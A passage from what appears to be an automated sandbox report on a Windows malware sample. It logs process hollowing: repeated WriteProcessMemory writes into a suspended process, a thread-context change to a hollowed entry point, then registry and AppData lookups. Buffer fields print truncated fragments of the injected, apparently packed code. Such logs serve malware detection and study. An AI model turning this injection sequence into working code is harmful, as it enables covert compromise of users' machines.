\x80\\xb2\\x0c\\x00\\x800\\x04\\x00\\x80\\xc2\\x0c\\x00\\x80H\\x04\\x00\\x80" }, { "name": "BufferLength", "value": "0x00006400" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1266 }, { "timestamp": "2025-03-02 21:32:30,675", "thread_id": "4148", "caller": "0x00408359", "parentcaller": "0x00409c49", "category": "process", "api": "WriteProcessMemory", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x004e7000" }, { "name": "Buffer", "value": "\\x90`\\xe8\\x03\\x00\\x00\\x00\\xe9\\xeb\\x04]EU\\xc3\\xe8\\x01\\x00\\x00\\x00\\xeb]\\xbb\\xed\\xff\\xff\\xff\\x03\\xdd\\x81\\xeb\\x00p\\x0e\\x00\\x83\\xbd\\x88\\x04\\x00\\x00\\x00\\x89\\x9d\\x88\\x04\\x00\\x00\\x0f\\x85\\xcb\\x03\\x00\\x00\\x8d\\x85\\x94\\x04\\x00\\x00P\\xff\\x95\\xa9\\x0f\\x00\\x00\\x89\\x85\\x8c\\x04\\x00\\x00\\x8b\\xf0\\x8d}QWV\\xff\\x95\\xa5\\x0f\\x00\\x00\\xab\\xb0\\x00\\xaeu\\xfd8\\x07u\\xee\\x8dEz\\xff\\xe0VirtualAlloc\\x00VirtualFree\\x00VirtualProtect\\x00\\x00\\x8b\\x9d\\x95\\x05\\x00\\x00\\x0b\\xdbt\n\\x8b\\x03\\x87\\x85\\x99\\x05\\x00\\x00\\x89\\x03\\x8d\\xb5\\xc5\\x05\\x00\\x00\\x83>\\x00\\x0f\\x84\n\\x01\\x00\\x00j\\x04h\\x00\\x10\\x00\\x00h\\x00\\x18\\x00\\x00j\\x00\\xffUQ\\x89\\x85H\\x01\\x00\\x00\\x8bF\\x04\\x05\\x0e\\x01\\x00\\x00\\x0f\\x84\\xb7\\x00\\x00\\x00j\\x04h\\x00\\x10\\x00\\x00Pj\\x00\\xffUQ\\x89\\x85D\\x01\\x00\\x00V\\x8b\\x1e\\x03\\x9d\\x88\\x04\\x00\\x00\\xff\\xb5H\\x01\\x00\\x00\\xffv\\x04PS\\xe8\\xc7\\x05\\x00" }, { "name": "BufferLength", "value": "0x0002bc00" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1267 }, { "timestamp": "2025-03-02 21:32:30,722", "thread_id": "4148", "caller": "0x00408359", "parentcaller": "0x00409c49", "category": "process", "api": "WriteProcessMemory", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x00513000" }, { "name": "Buffer", "value": "" }, { "name": "BufferLength", "value": "0x00000000" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1268 }, { "timestamp": "2025-03-02 21:32:30,722", "thread_id": "4148", "caller": "0x004083c6", "parentcaller": "0x00409c49", "category": "process", "api": "WriteProcessMemory", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x00514000" }, { "name": "Buffer", "value": " K\\xbb\\xb2\\x99\\x11\\xaa\\x004\\xc7\\x9c\\xe7<\\x92rC\\x81\\xce@\\x91!\\x08\\x93\\x8aE\\x08\\xa7\\xa4\\x84\\x04!\\x08\\x9c$\\x84!\\xef!\t\\x02C\\xd5\\x14#\\x10\\x10,\\x9erB\\xa8\\x84\\xe5\\xf2D\\x9e\\x1f\\xaf++\\xeb]\\xea\\xf6\\xd4\\xa2\\xde\\xb5\\xafm\\x8f\\xb1\\x01j\\xf2N\\x04\\x84\\x05\\x18\\x03R\\x04=\\xc1\\x19\\x0f\\x14\"\\x8b\\x08\\x04Ny\\xc9\\x08\\xc1\\xdd\\xeb\\xda\\xb9\\xdc\\xdc\\xcbw73N\\xef\\xfd\\x07w3r\\x03\\xdd\\xdc\\x81\\xdbwy\\x07\\xbb\\xb6\\x05j\\xf2\\x03k\\x14k`\n\\x91\\x02\\xe3\\x90\\x1b\\x8eAonp\\x17\\xaeC\\xad\\xaeA\\xed\\xb7 ^\\xeb\\x90;\\xd5\\xc0v\\xe6\\xe4\\x86\\xdb\\xdc\\x81n\\xdc\\x91\\xee\\xee`\\xbb\\xdbpm\\xee\\xeegw\\xfb\\xff\\xf5\\xfd\\xff|\\xf9\\xf7\\xef\\xdf>\\xfe\\xfd\\xf7\\xf7\\xef3\\xces\\xff\\xfe{\\xfc\\x0c\\xc1\\xa0\\x8a&/Z\\xadV\\x8b-\\x8e\\xd2H/\\x9f\\xfe\\xce\\x80%0\\xd8\\xed\r\\xb6P\\xebm\\x86\\xec\\xa7Q\n$\\&\\x1a\\xfb]\\x8d\\xb3FH3GCQx\\x91V^-\\x1dZ" }, { "name": "BufferLength", "value": "0x00039c00" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1269 }, { "timestamp": "2025-03-02 21:32:30,753", "thread_id": "4148", "caller": "0x004083c6", "parentcaller": "0x00409c49", "category": "process", "api": "WriteProcessMemory", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x005a2000" }, { "name": "Buffer", "value": "\\x14;\\xbb\\xb2\\x91\\x90\\x00\\x00B\\xbf\\x9b\\x9b&ud\\\\xcaX2CV\\xc4\\xcc\\xa5\\xc3.\\x04\\xa7F\\xb2\\xe6]\\xb2n6\\xe3\\xa5\\xd2\\xe3;s\\x9c\\xb8\\xb3l\\xdc\\xe7\\x12k0\\xff\\x9ca[\\x8bLl\\x13C\\x19\\xe1\\xccC\\x03BS\\x07\\x8b\\xae\\x84\\x16\\xd6J\\x816Jch\\xdc-\\xa8\\xfb\\xa5u\\x96vx\\xa76\\xe7\\x9f>\\xf9\\xb8x\\x1a#7^\\xba\\xab\\xb5\\xebwF\\x05J\\x0ey\\xaa4\\xe2\\xb0\\xa3\\xd1<\\xe9\\x85\\x184n\\xb5\\xc3cDA\\xc4\\xbf\\xc1+\\xa5\\xa2#]iA\\x8b\\xa2\\xfd\\xff\\xf7\\xff\\xc0\\xef_\\xde\\xc3\\xefG\\xdf\\xc0\\xfe\\x87\\xdf\\x9e\\xfd{\\xf9\\xf3\\xd7\\xc4\\xees\\xb9g\\xc21M)\\xe4H\\xe0\\x8b\\xc6\\xea\\xabWk\\x99\\x99\\xc8a\\xa7<\\xc6f\\xc3\\xb6K\\xab^`\\x8b3\"\\x0f!\\xf2\\xf6l\\xe9d\\x04D\\x11B\\xa9\\xce\\xdd,\\x85\\x02fa6>\\xd9b\\xd8\\xd8\\xd1[\\xb0\\xf0Nz>\\xe3vUx\\x9d\\x07dt\\x96\\xe1S\\xbd\\xc3\\x05\\xb7\\xb5\\x1d\\x87\\xd2\\xf7\\x00NX<\\xfd\\xf9\\xd0\\xa1\\x95" }, { "name": "BufferLength", "value": "0x00000600" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1270 }, { "timestamp": "2025-03-02 21:32:30,784", "thread_id": "4148", "caller": "0x004083c6", "parentcaller": "0x00409c49", "category": "process", "api": "WriteProcessMemory", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x005a3000" }, { "name": "Buffer", "value": "$C\\xbb\\xb2\\x19\\x11\\xa0\\x00\\x15Y(/\\xa041\\x914\\xfe\\xda<&\\xb9\\x9es\\xcb\\x87\\xcc\\x82\\x1cR\\x03 \\xf5\\x8aDd\\x13b\\x91\\x99\\x058\\xa7c!\\x15\\x8aHd$\\xb1O\\x86@\\xf5B" }, { "name": "BufferLength", "value": "0x00001200" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1271 }, { "timestamp": "2025-03-02 21:32:30,784", "thread_id": "4148", "caller": "0x004083c6", "parentcaller": "0x00409c49", "category": "process", "api": "WriteProcessMemory", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x005a6000" }, { "name": "Buffer", "value": "" }, { "name": "BufferLength", "value": "0x00000000" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1272 }, { "timestamp": "2025-03-02 21:32:30,815", "thread_id": "4148", "caller": "0x004083c6", "parentcaller": "0x00409c49", "category": "process", "api": "WriteProcessMemory", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x005aa000" }, { "name": "Buffer", "value": "\\x10;3\\xaa!\\x19\\x80\\x00:\\xba\"A\\xa8\\x94K\\xd1JR\\x90\\x85!\\x04\\x82$\\x1b\nB\\x08\\x93?\\x1b\\xf9\\x93u\\xdc\\x8e\\xe4\\xc6\\x88\\x96<\\xdc\\xe73s\\x8e\\xf39\\xcc\\x9c\\xe73]\\xd6\\xb6V\\xb6Y[+Z\\xd9ef\\xc4HN\\x84H\"$)\\x04J\"R\\x08\\x90\\xa4 \\x88\\x90J$\\x12\\x08\\x90\\x82$!DD\\x843\\xce\\x8ad\\xe4\\x91vil\\x9bG\\xa2\\xce\\xd6u\\xad\\x08\\x1a\\xc9\\xaa.\\xb9\\x9c\\xcdZ\\xc9\\x98\\xc2\\xc5\\xdd,e\\xc6-v5\\x82\\x9a\\xcc\\x8aGma\\x93WCd\\xd6\\xc1u\\x9a\\x8c\\xdd\\xb11\\xd6f\\x9bZ\\xc4uX\\x8cla#,\\xc0\\xbd/\\xff\\xff\\xf5\\xd3\\xcf\\xcf<\\xf7\\xdc\\xfa\\x19\\x9d8`a\\xf7\\xcf~{\\xf3\\xdf=[\\xd0|\\xaa\\xc7\\xee\\xb7t2\\xf7kl\\xc9\\x89N\\x8c\\x08\\xc7\\x04[\\x1a\\xd7\\xd8k[\\x91krlm\\x03\\x92\\x15\\xf3\\xdb\\x0cG\\xd9k\\x7f\\x166\\xc6\\xc1pk\\x83\\x18\\x94[\\x0f\\xa1\\xf7\\xda\\xc8\\xfdf\\xb8\\xb6\\xc7\\x98\\x16\\xf1\\xf3\\xa4\\x1b\n\\xffJ\\xd6\\xf7" }, { "name": "BufferLength", "value": "0x00000e00" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1273 }, { "timestamp": "2025-03-02 21:32:30,815", "thread_id": "4148", "caller": "0x004083c6", "parentcaller": "0x00409c49", "category": "process", "api": "WriteProcessMemory", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x005ad000" }, { "name": "Buffer", "value": "" }, { "name": "BufferLength", "value": "0x00000000" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1274 }, { "timestamp": "2025-03-02 21:32:30,831", "thread_id": "4148", "caller": "0x004083c6", "parentcaller": "0x00409c49", "category": "process", "api": "WriteProcessMemory", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x005ae000" }, { "name": "Buffer", "value": "\\x00\\xa0I\\x00@\\xa0I\\x00\\xac\\x07I\\x00\\x10\\xb0I\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" }, { "name": "BufferLength", "value": "0x00000200" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1275 }, { "timestamp": "2025-03-02 21:32:30,847", "thread_id": "4148", "caller": "0x004083c6", "parentcaller": "0x00409c49", "category": "process", "api": "WriteProcessMemory", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x005af000" }, { "name": "Buffer", "value": "" }, { "name": "BufferLength", "value": "0x00000000" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1276 }, { "timestamp": "2025-03-02 21:32:30,862", "thread_id": "4148", "caller": "0x004083c6", "parentcaller": "0x00409c49", "category": "process", "api": "WriteProcessMemory", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x005b8000" }, { "name": "Buffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\t\\x00\\x01\\x00\\x00\\x00X\\x00\\x00\\x80\\x02\\x00\\x00\\x00\\xa0\\x00\\x00\\x80\\x03\\x00\\x00\\x00\\x08\\x01\\x00\\x80\\x05\\x00\\x00\\x00p\\x01\\x00\\x80\\x06\\x00\\x00\\x00\\x90\\x01\\x00\\x80\n\\x00\\x00\\x00 \\x02\\x00\\x80\\x0c\\x00\\x00\\x00P\\x02\\x00\\x80\\x0e\\x00\\x00\\x00\\x98\\x02\\x00\\x80\\x10\\x00\\x00\\x00\\xb0\\x02\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x07\\x00\\x01\\x00\\x00\\x00\\xc8\\x02\\x00\\x80\\x02\\x00\\x00\\x00\\xe0\\x02\\x00\\x80\\x03\\x00\\x00\\x00\\xf8\\x02\\x00\\x80\\x04\\x00\\x00\\x00\\x10\\x03\\x00\\x80\\x05\\x00\\x00\\x00(\\x03\\x00\\x80\\x06\\x00\\x00\\x00@\\x03\\x00\\x80\\x07\\x00\\x00\\x00X\\x03\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x0b\\x00\\x00\\x00@\\x0c\\x00\\x80p\\x03\\x00\\x80P\\x0c\\x00\\x80\\x88\\x03\\x00\\x80\\\\x0c\\x00\\x80\\xa0\\x03\\x00\\x80n\\x0c\\x00\\x80\\xb8\\x03\\x00\\x80~\\x0c\\x00\\x80\\xd0\\x03\\x00\\x80\\x8c\\x0c\\x00\\x80\\xe8\\x03\\x00\\x80\\x9e\\x0c\\x00\\x80\\x00\\x04\\x00\\x80\\xa8\\x0c\\x00\\x80\\x18\\x04\\x00\\x80\\xb2\\x0c\\x00\\x800\\x04\\x00\\x80\\xc2\\x0c\\x00\\x80H\\x04\\x00\\x80" }, { "name": "BufferLength", "value": "0x00006400" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1277 }, { "timestamp": "2025-03-02 21:32:30,878", "thread_id": "4148", "caller": "0x004083c6", "parentcaller": "0x00409c49", "category": "process", "api": "WriteProcessMemory", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x005fa000" }, { "name": "Buffer", "value": "\\x90`\\xe8\\x03\\x00\\x00\\x00\\xe9\\xeb\\x04]EU\\xc3\\xe8\\x01\\x00\\x00\\x00\\xeb]\\xbb\\xed\\xff\\xff\\xff\\x03\\xdd\\x81\\xeb\\x00p\\x0e\\x00\\x83\\xbd\\x88\\x04\\x00\\x00\\x00\\x89\\x9d\\x88\\x04\\x00\\x00\\x0f\\x85\\xcb\\x03\\x00\\x00\\x8d\\x85\\x94\\x04\\x00\\x00P\\xff\\x95\\xa9\\x0f\\x00\\x00\\x89\\x85\\x8c\\x04\\x00\\x00\\x8b\\xf0\\x8d}QWV\\xff\\x95\\xa5\\x0f\\x00\\x00\\xab\\xb0\\x00\\xaeu\\xfd8\\x07u\\xee\\x8dEz\\xff\\xe0VirtualAlloc\\x00VirtualFree\\x00VirtualProtect\\x00\\x00\\x8b\\x9d\\x95\\x05\\x00\\x00\\x0b\\xdbt\n\\x8b\\x03\\x87\\x85\\x99\\x05\\x00\\x00\\x89\\x03\\x8d\\xb5\\xc5\\x05\\x00\\x00\\x83>\\x00\\x0f\\x84\n\\x01\\x00\\x00j\\x04h\\x00\\x10\\x00\\x00h\\x00\\x18\\x00\\x00j\\x00\\xffUQ\\x89\\x85H\\x01\\x00\\x00\\x8bF\\x04\\x05\\x0e\\x01\\x00\\x00\\x0f\\x84\\xb7\\x00\\x00\\x00j\\x04h\\x00\\x10\\x00\\x00Pj\\x00\\xffUQ\\x89\\x85D\\x01\\x00\\x00V\\x8b\\x1e\\x03\\x9d\\x88\\x04\\x00\\x00\\xff\\xb5H\\x01\\x00\\x00\\xffv\\x04PS\\xe8\\xc7\\x05\\x00" }, { "name": "BufferLength", "value": "0x0002bc00" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1278 }, { "timestamp": "2025-03-02 21:32:30,894", "thread_id": "4148", "caller": "0x004083c6", "parentcaller": "0x00409c49", "category": "process", "api": "WriteProcessMemory", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x00626000" }, { "name": "Buffer", "value": "" }, { "name": "BufferLength", "value": "0x00000000" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1279 }, { "timestamp": "2025-03-02 21:32:30,909", "thread_id": "4148", "caller": "0x004083fb", "parentcaller": "0x00409c49", "category": "process", "api": "WriteProcessMemory", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x003a1008" }, { "name": "Buffer", "value": "\\x00\\x00@\\x00" }, { "name": "BufferLength", "value": "0x00000004" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1280 }, { "timestamp": "2025-03-02 21:32:30,925", "thread_id": "4148", "caller": "0x00408420", "parentcaller": "0x00409c49", "category": "threading", "api": "NtSetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0x000002d8" }, { "name": "HollowedInstructionPointer", "value": "0x004e7001" }, { "name": "CurrentInstructionPointer", "value": "0x771c57c0" }, { "name": "Flags", "value": "0x00010007" } ], "repeated": 0, "id": 1281 }, { "timestamp": "2025-03-02 21:32:30,940", "thread_id": "4148", "caller": "0x00408482", "parentcaller": "0x00409c49", "category": "process", "api": "WriteProcessMemory", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x00400090" }, { "name": "Buffer", "value": "\\x00\\x00Y\\x01" }, { "name": "BufferLength", "value": "0x00000004" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1282 }, { "timestamp": "2025-03-02 21:32:30,956", "thread_id": "4148", "caller": "0x0040848c", "parentcaller": "0x00409c49", "category": "threading", "api": "NtResumeThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0x000002d8" }, { "name": "SuspendCount", "value": "1" }, { "name": "ThreadId", "value": "7632" }, { "name": "ProcessId", "value": "7456" } ], "repeated": 0, "id": 1283 }, { "timestamp": "2025-03-02 21:32:31,097", "thread_id": "4148", "caller": "0x00408496", "parentcaller": "0x00409c49", "category": "threading", "api": "NtSuspendThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0x000002d8" }, { "name": "SuspendCount", "value": "0" }, { "name": "ThreadId", "value": "7632" }, { "name": "ProcessId", "value": "7456" } ], "repeated": 0, "id": 1284 }, { "timestamp": "2025-03-02 21:32:31,097", "thread_id": "4148", "caller": "0x004084b7", "parentcaller": "0x00409c49", "category": "process", "api": "WriteProcessMemory", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x00400090" }, { "name": "Buffer", "value": "\\x00\\x80\"\\x00" }, { "name": "BufferLength", "value": "0x00000004" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1285 }, { "timestamp": "2025-03-02 21:32:31,112", "thread_id": "4148", "caller": "0x004089b9", "parentcaller": "0x00409c49", "category": "threading", "api": "NtResumeThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0x000002d8" }, { "name": "SuspendCount", "value": "1" }, { "name": "ThreadId", "value": "7632" }, { "name": "ProcessId", "value": "7456" } ], "repeated": 0, "id": 1286 }, { "timestamp": "2025-03-02 21:32:31,128", "thread_id": "4148", "caller": "0x00408a4d", "parentcaller": "0x00409c49", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x00000008" }, { "name": "TokenHandle", "value": "0x000002e8" } ], "repeated": 0, "id": 1287 }, { "timestamp": "2025-03-02 21:32:31,128", "thread_id": "4148", "caller": "0x00408a4d", "parentcaller": "0x00409c49", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "29" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1288 }, { "timestamp": "2025-03-02 21:32:31,128", "thread_id": "4148", "caller": "0x00408a4d", "parentcaller": "0x00409c49", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "25" }, { "name": "TokenInformation", "value": "\\xd8D\\x18\\x00`\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x10\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1289 }, { "timestamp": "2025-03-02 21:32:31,128", "thread_id": "4148", "caller": "0x00408a4d", "parentcaller": "0x00409c49", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002e4" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x000002c4" }, { "name": "ObjectAttributesName", "value": "SessionInfo\\1" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1" } ], "repeated": 0, "id": 1290 }, { "timestamp": "2025-03-02 21:32:31,128", "thread_id": "4148", "caller": "0x00408a4d", "parentcaller": "0x00409c49", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x000002e4" }, { "name": "ObjectAttributesName", "value": "KnownFolders" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\KnownFolders" } ], "repeated": 0, "id": 1291 }, { "timestamp": "2025-03-02 21:32:31,128", "thread_id": "4148", "caller": "0x00408a4d", "parentcaller": "0x00409c49", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002e4" } ], "repeated": 0, "id": 1292 }, { "timestamp": "2025-03-02 21:32:31,128", "thread_id": "4148", "caller": "0x00408a4d", "parentcaller": "0x00409c49", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\xb4B\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xfe\\xff\\xff\\xff4C\\x18\\x00\\x17\\xa0Ot\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00&\\xa0Ot\\xbc\\xdcCtXC\\x18\\x00TC\\x18\\x00\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1293 }, { "timestamp": "2025-03-02 21:32:31,128", "thread_id": "4148", "caller": "0x00408a4d", "parentcaller": "0x00409c49", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002e4" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-2901619373-3413834416-3107304870-1001" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER" } ], "repeated": 0, "id": 1294 }, { "timestamp": "2025-03-02 21:32:31,128", "thread_id": "4148", "caller": "0x00408a4d", "parentcaller": "0x00409c49", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002ec" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x000002e4" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" } ], "repeated": 0, "id": 1295 }, { "timestamp": "2025-03-02 21:32:31,128", "thread_id": "4148", "caller": "0x00408a4d", "parentcaller": "0x00409c49", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002e4" } ], "repeated": 0, "id": 1296 }, { "timestamp": "2025-03-02 21:32:31,128", "thread_id": "4148", "caller": "0x00408a4d", "parentcaller": "0x00409c49", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002ec" }, { "name": "ValueName", "value": "Local AppData" }, { "name": "Type", "value": "2", "pretty_value": "REG_EXPAND_SZ" }, { "name": "Information", "value": "%USERPROFILE%\\AppData\\Local" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Local AppData" } ], "repeated": 0, "id": 1297 }, { "timestamp": "2025-03-02 21:32:31,128", "thread_id": "4148", "caller": "0x00408a4d", "parentcaller": "0x00409c49", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002e8" } ], "repeated": 0, "id": 1298 }, { "timestamp": "2025-03-02 21:32:31,128", "thread_id": "4148", "caller": "0x00408a4d", "parentcaller": "0x00409c49", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002ec" } ], "repeated": 0, "id": 1299 }, { "timestamp": "2025-03-02 21:32:31,128", "thread_id": "4148", "caller": "0x00408a4d", "parentcaller": "0x00409c49", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local" } ], "repeated": 0, "id": 1300 }, { "timestamp": "2025-03-02 21:32:31,128", "thread_id": "4148", "caller": "0x00408a4d", "parentcaller": "0x00409c49", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 1301 }, { "timestamp": "2025-03-02 21:32:31,128", "thread_id": "4148", "caller": "0x00408aa5", "parentcaller": "0x00409c49", "category": "filesystem", "api": "NtCreateFile", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "FileHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x80100080", 